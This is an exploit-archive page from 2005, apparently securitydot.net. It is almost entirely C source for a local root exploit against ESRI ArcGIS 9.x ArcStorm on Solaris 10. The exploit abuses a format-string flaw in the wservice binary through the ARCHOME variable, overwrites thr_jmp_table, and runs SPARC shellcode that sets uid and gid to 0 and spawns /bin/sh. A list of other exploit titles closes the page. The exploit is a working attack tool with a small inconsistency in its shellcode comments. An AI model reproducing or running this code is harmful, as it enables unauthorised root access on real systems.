exploits , vulnerabilities , articles , ESRI ArcGIS 9.x ArcStorm Local Format String (Root) Exploit

2005-05-02

ESRI ArcGIS 9.x ArcStorm Local Format String (Root) Exploit

/** ESRI 9.x Arcgis local root format string exploit
**
** Copyright Kevin Finisterre and John H.
** Bug found by Kevin Finisterre <kf@digitalmunition.com>
** Exploit by John H. <johnh@digitalmunition.com>
**
** We overwrite the thr_jmp_table
** Tested on solaris 10
**/

#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define VULPROG "/export/home/arcgis/arcexe9x/bin/wservice"
#define NOP "\xa2\x1c\x40\x11"
int iType;

struct
{
unsigned long retloc;
unsigned long retaddr;
char *type;
}targets[] =
{

/* bash-2.05b$ nm /usr/lib/ld.so.1 | grep thr_jmp_table
0003a234 d thr_jmp_table
*/
{0xff3ea234,0xffbffba8,"SunOS 5.10sun 4u sparc SUNW"},
{0x41424344,0x41424344,"DEBUG"},
},v;

//shellcode taken from netric
char shellcode[] =
"55"

NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP

// setreuid(0,0);

"\x90\x1d\x80\x16" // xor %l6, %l6, %o0
"\x92\x1d\x80\x16" // xor %l6, %l6, %o1
"\x82\x10\x20\xca" // mov 0xca, %g1
"\x91\xd0\x20\x08" // ta 8

"\x90\x1d\x80\x16" // xor %l6, %l6, %o0
"\x92\x1d\x80\x16" // xor %l6, %l6, %o1
"\x82\x18\x40\x01" // xor %g1, %g1, %g1
"\x82\x10\x20\xcb" // mov 0x2e, %g1
"\x91\xd0\x20\x08" // ta 8 [setregid(0,0)]

"\x21\x0b\xd9\x19" // sethi %hi(0x2f646400), %l0
"\xa0\x14\x21\x76" // or %l0, 0x176, %l0
"\x23\x0b\xdd\x1d" // sethi %hi(0x2f747400), %l1
"\xa2\x14\x60\x79" // or %l1, 0x79, %l1
"\xe0\x3b\xbf\xf8" // std %l0, [ %sp - 0x8 ]
"\x90\x23\xa0\x08" // sub %sp, 8, %o0
"\x92\x1b\x80\x0e" // xor %sp, %sp, %o1
"\x82\x10\x20\x05" // mov 0x05, %g1
"\x91\xd0\x20\x08" // ta 8 [open("/dev/tty",RD_ONLY)]

"\x90\x10\x20\x02" // mov 0x02, %o0
"\x82\x10\x20\x29" // mov 0x29, %g1
"\x91\xd0\x20\x08" // ta 8 [dup(2)]

"\x21\x0b\xd8\x9a" // sethi %hi(0x2f626800), %l0
"\xa0\x14\x21\x6e" // or %l0, 0x16e, %l0
"\x23\x0b\xcb\xdc" // sethi %hi(0x2f2f7000), %l1
"\xa2\x14\x63\x68" // or %l1, 0x368, %l1
"\xe0\x3b\xbf\xf0" // std %l0, [ %sp - 0x10 ]
"\xc0\x23\xbf\xf8" // clr [ %sp - 0x8 ]
"\x90\x23\xa0\x10" // sub %sp, 0x10, %o0
"\xc0\x23\xbf\xec" // clr [ %sp - 0x14 ]
"\xd0\x23\xbf\xe8" // st %o0, [ %sp - 0x18 ]
"\x92\x23\xa0\x18" // sub %sp, 0x18, %o1
"\x94\x22\x80\x0a" // sub %o2, %o2, %o2
"\x82\x18\x40\x01" // xor %g1, %g1, %g1
"\x82\x10\x20\x3b" // mov 0x3b, %g1
"\x91\xd0\x20\x08" // ta 8
[execve("/bin/sh","/bin/sh",NULL)]

"\x82\x10\x20\x01" // mov 0x01, %g1
"\x91\xd0\x20\x08" // ta 8 [exit(?)]

"\x10\xbf\xff\xdf" // b shellcode
"\x90\x1d\x80\x16"; // or %o1, %o1, %o1

/* Big endian */
/* sparc */
char *putLong (char* ptr, long value)
{
*ptr++ = (char) (value >> 24) & 0xff;
*ptr++ = (char) (value >> 16) & 0xff;
*ptr++ = (char) (value >> 8) & 0xff;
*ptr++ = (char) (value >> 0) & 0xff;

return ptr;
}

/* main */
int main(int argc, char **argv)
{

unsigned long retaddr;
unsigned long retloc;
int offset = 23;
int dump_fmt=129;
int al = 1;
int i=0;
int x=0;
int c;
unsigned long hi,lo;
static unsigned long shift0,shift1;
char buf[9000];
char *args[24];
char *env[6];
char *ptr;
char padding[64];
char padding1[64];
char buf2[9000];

if (argc < 3) {
usage (argv[0]);
return -1;
}

while((c = getopt(argc, argv, "h:t:")) != EOF) {
switch(c) {
case 'h':
usage (argv[0]);
return 0;
case 't':
iType = atoi (optarg);
break;
default:
usage (argv[0]);
return 0;
}
}

if (argc < 2) { usage(argv[0]); exit(1); }

if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
{
usage(argv[0]);
printf("[-] Invalid type.\n");
return 0;
}

env[0] = shellcode;
env[1] = buf2;
env[2] = NULL;

args[0] = VULPROG;
args[1] = NULL;

retloc = targets[iType].retloc;
retaddr = targets[iType].retaddr;

hi = (retaddr >> 16) & 0xffff;
lo = (retaddr >> 0) & 0xffff;

shift0 = hi - offset - (dump_fmt * 8 + 16 + al);
shift1 = (0x10000 + lo) - hi;

memset(buf,0x00,sizeof(buf));
memset(buf2,0x00,sizeof(buf2));
ptr = buf;

for (i = 0; i < al; i++) {
*ptr++ = 0x41;
}

ptr = putLong (ptr, 0x41414141);
ptr = putLong (ptr, retloc);
ptr = putLong (ptr, 0x42424242);
ptr = putLong (ptr, retloc+2);

for (i = 0 ; i < dump_fmt; i ++) {
memcpy(ptr, "%.8x", 4);
ptr = ptr + 4;
}

strcat(ptr,"%.");
sprintf(ptr+strlen(ptr),"%u",shift0);
strcat(ptr,"lx%hn");

strcat(ptr,"%.");
sprintf(ptr+strlen(ptr),"%u",shift1);
strcat(ptr,"lx%hn");

strcat(buf2,"ARCHOME=");
memcpy(buf2+strlen(buf2),buf,strlen(buf));

execve (args[0], args, env);
perror ("execve");
return 0;
}

int usage(char *p)
{
int i;
printf( "Arcgis local root format string exploit\r\n");
printf( "Usage: %s <-t target>\n",p);
for(i=0;i<sizeof(targets)/sizeof(v);i++)
{
printf("%d\t%s\n", i, targets[i].type);
}
return 0;
}
securitydot.net - 2005-05-02

Exploits - newest 10 RSS | More

2007-06-15 56326 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33539 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41701 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28864 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19375 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16390 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19039 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16266 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33128 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16916 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit